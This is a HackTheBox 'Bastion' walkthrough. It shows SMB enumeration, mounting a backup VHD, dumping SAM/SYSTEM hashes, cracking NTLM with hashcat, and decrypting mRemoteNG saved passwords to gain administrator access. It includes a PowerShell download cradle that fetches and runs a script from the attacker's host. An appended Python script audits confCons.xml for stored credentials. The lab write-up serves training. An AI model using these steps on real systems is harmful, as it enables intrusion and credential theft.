# HackTheBox - Bastion

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0NPgQwXjWbZQwwnlz%2Fimage.png?alt=media\&token=bdce5d2c-0219-40cc-b3b5-d8be3b5eb41b)

### Nmap scan (Basic and All port scan)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0NqJYWQA221WZ3DYj%2Fimage.png?alt=media\&token=c62e8425-65e8-4c9b-8683-ac780500b065)

Always ping the machine before starting the nmap scan and check the TTL (Time To Live) value in the reply. Most Windows machines answer with a TTL of 127.

```
nmap -sC -sV -oA nmap-bastion 10.10.10.134
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0ONJC5eQGl_d7Uz-I%2Fimage.png?alt=media\&token=334edc17-6b5c-4231-a2b5-f0f80db126cb)

```
nmap -A -p- -T4 10.10.10.134
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0YMp2izzQv8e40X8h%2Fimage.png?alt=media\&token=191f0f07-f48b-48be-8e4f-f14d3b46a0af)

### Samba Enumeration (Port 139/445)

We use smbclient to list all the shares.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0P5w8hdAhJ9lvW0eC%2Fimage.png?alt=media\&token=2ea15456-15af-4624-b3a8-5ec64b8ad0a0)

We can also use smbmap with null authentication.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0PDzFk-njKr50IVCQ%2Fimage.png?alt=media\&token=812b8810-38b0-449d-a33f-351f4d0485ec)

This box covers the same scenario as a bastion host. So what exactly is a bastion host?

`A bastion host is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application, for example a proxy server, and all other services are removed or limited to reduce the threat to the computer.`

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0Uk1XzqbebeIRgs6l%2Fimage.png?alt=media\&token=c08787b8-2b44-40d8-93e7-b2cbf755eabf)

### Mounting the SMB Share

We can mount the SMB Share using `mount` command.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0XAWIkScN5SQZEi1w%2Fimage.png?alt=media\&token=e7ba2de9-f9ff-4894-9926-ac2ab454f9de)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0XLtenQC3Gptfwqmu%2Fimage.png?alt=media\&token=2a74b634-da96-4b25-8e10-dceecf7353ac)

The backup file is very large (approximately 5 GB).

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0XhZlnw5xrp2TJx1H%2Fimage.png?alt=media\&token=4bf59270-54e7-4d07-af68-890d6227e9b2)

`Note: A VHD file contains a virtual hard disk image used by Microsoft Windows Virtual PC, a Windows virtualization program. It stores the contents of a hard disk of a virtual machine (VM), which may include disk partitions, a file system, files, and folders.`

### Mounting the .vhd file using guestmount

We can extract the .vhd file with 7z on a Linux system. First, list all the files it contains: `7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd`

To mount the .vhd file system, we use guestmount on Linux.

```
apt-get install libguestfs-tools
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0aTanCrj4jeTEwZ49%2Fimage.png?alt=media\&token=f87b0eee-72de-455a-b915-dc86793f673e)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0dDOQeOM8BRsCaGGD%2Fimage.png?alt=media\&token=bf05b03a-e3ad-47d8-90c2-6641390e32bf)

One thing we can do is copy the SAM and SYSTEM hives: SAM stores the password hashes of the local users, and SYSTEM holds the boot key needed to decrypt them.

### Hash Cracking with hashcat

> The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores users' passwords. It can be used to authenticate local and remote users. ... SAM uses cryptographic measures to prevent unauthenticated users accessing the system.

```
impacket-secretsdump -sam SAM -system SYSTEM local
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0eZBB0gKMRy6Y37bx%2Fimage.png?alt=media\&token=724a661e-4fff-463f-86d9-a3e238a51a68)

> Tip: If the NT hash starts with 31d6..., it is the hash of an empty password; on this box that means the Administrator account is disabled.

We can crack the hash for the L4mpje user with hashcat in mode 1000 (NTLM).

```
hashcat.exe -m 1000 hash.txt rockyou.txt
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0g6UBZpTFXAm4mu5M%2Fimage.png?alt=media\&token=11ad7581-5845-4d53-a359-f8e2b7b47240)

### SSH Access as l4mpje

We know from the nmap scan that SSH is running on the machine, so we can use the cracked password to get remote access.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0hogcRUIIPp5AC9lz%2Fimage.png?alt=media\&token=a11f35a6-1319-4dec-8a21-1d2506ab9bca)

### System Enumeration using JAWS

We will use JAWS (Just Another Windows Script) for system enumeration, served from our machine over HTTP.

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1')
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0NJAtPWYRfUjpHn_U%2F-MY0kNYu8sSpyhpCztup%2Fimage.png?alt=media\&token=670f11a4-aff0-4c66-a457-626acaed0d2d)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0kxHUWMdbXcitmqgc%2F-MY0r9-CPNDnKvVdVhGK%2Fimage.png?alt=media\&token=67cc9c0b-adbf-4b78-b844-6da4e2900caa)

### Exploiting mRemoteNG to extract passwords

mRemoteNG is installed on the system, and it usually stores its configuration files in the user's AppData folder.

> mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager for Windows. mRemoteNG adds bug fixes and new features to mRemote. It allows you to view all of your remote connections in a simple yet powerful tabbed interface.

We can view the configuration files under `C:\Users\L4mpje\AppData\Roaming\mRemoteNG`.

`Note: dir /a (the attribute switch) lists all files, including hidden ones.`

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0kxHUWMdbXcitmqgc%2F-MY0sBZmx5ga6H8UTfJ4%2Fimage.png?alt=media\&token=67b450f9-8668-4ff8-9fc4-f97ff802d39d)

We find the `confCons.xml` file, which holds the saved connection passwords as base64-encoded encrypted strings; they can be decrypted with the following tool: <https://github.com/haseebT/mRemoteNG-Decrypt>

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0kxHUWMdbXcitmqgc%2F-MY0t7_ayJD9dzRTSGq6%2Fimage.png?alt=media\&token=cefa7fb4-97ba-4fa4-aafd-f556788668ae)

This gives us the administrator password. Use ssh or evil-winrm to get shell access.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY0kxHUWMdbXcitmqgc%2F-MY0tzWKDEHom-IOnjJZ%2Fimage.png?alt=media\&token=3d719a13-4411-41d8-9329-90a9d1fbbb12)
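As an added example (not from this writeup and not code from the mRemoteNG project), a Python audit that parses a `confCons.xml`, reports the file-level encryption settings, and lists every saved connection that carries a stored password. The sample file is constructed in the layout of an mRemoteNG 1.76 `confCons.xml`; the attribute names are from my recollection of that version and are an assumption, and the `Password` and `Protected` values are placeholders, not ciphertext. Decrypting a stored password additionally needs the master password: the tool linked above works because mRemoteNG protects the file with a built-in default master password unless the user sets their own, which is the setting to change on any host where saved credentials matter.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout of an mRemoteNG 1.76 confCons.xml (attribute
# names assumed from that version; NOT the file from the box). Placeholder values
# stand in for the base64 ciphertext.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
      Password="PLACEHOLDER_CIPHERTEXT" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
  <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Domain=""
      Password="" Hostname="192.168.1.75" Protocol="RDP" Port="3389" />
  <Node Name="Servers" Type="Container" Expanded="True">
    <Node Name="Jump" Type="Connection" Username="svc_backup" Domain=""
        Password="PLACEHOLDER_CIPHERTEXT" Hostname="10.0.0.5" Protocol="SSH2" Port="22" />
  </Node>
</mrng:Connections>
"""

FILE_SETTINGS = ("ConfVersion", "EncryptionEngine", "BlockCipherMode",
                 "KdfIterations", "FullFileEncryption")


def audit_confcons(xml_text: str) -> dict:
    """Return the file-level crypto settings and every connection with a stored password."""
    root = ET.fromstring(xml_text)
    settings = {key: root.attrib.get(key, "") for key in FILE_SETTINGS}
    stored = []
    for node in root.iter("Node"):  # Node elements carry no namespace prefix
        if node.attrib.get("Type") != "Connection":
            continue  # containers only group connections
        if node.attrib.get("Password", ""):
            stored.append({
                "name": node.attrib.get("Name", ""),
                "host": node.attrib.get("Hostname", ""),
                "protocol": node.attrib.get("Protocol", ""),
                "username": node.attrib.get("Username", ""),
            })
    return {"settings": settings, "stored_credentials": stored}


def privileged_stored_credentials(xml_text: str,
                                  privileged=("administrator", "root", "admin")) -> list:
    """Stored credentials whose username is a well-known privileged account name."""
    report = audit_confcons(xml_text)
    return [c for c in report["stored_credentials"] if c["username"].lower() in privileged]


if __name__ == "__main__":
    report = audit_confcons(SAMPLE_CONFCONS)
    print("settings:", report["settings"])
    for cred in report["stored_credentials"]:
        print(f"{cred['name']}: {cred['username']}@{cred['host']} ({cred['protocol']})")
```

Run against the real file on a host, the output is the list of accounts whose passwords an attacker with read access to the user's profile could recover, which is the inventory a defender needs before deciding whether to clear them or enforce a custom master password.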
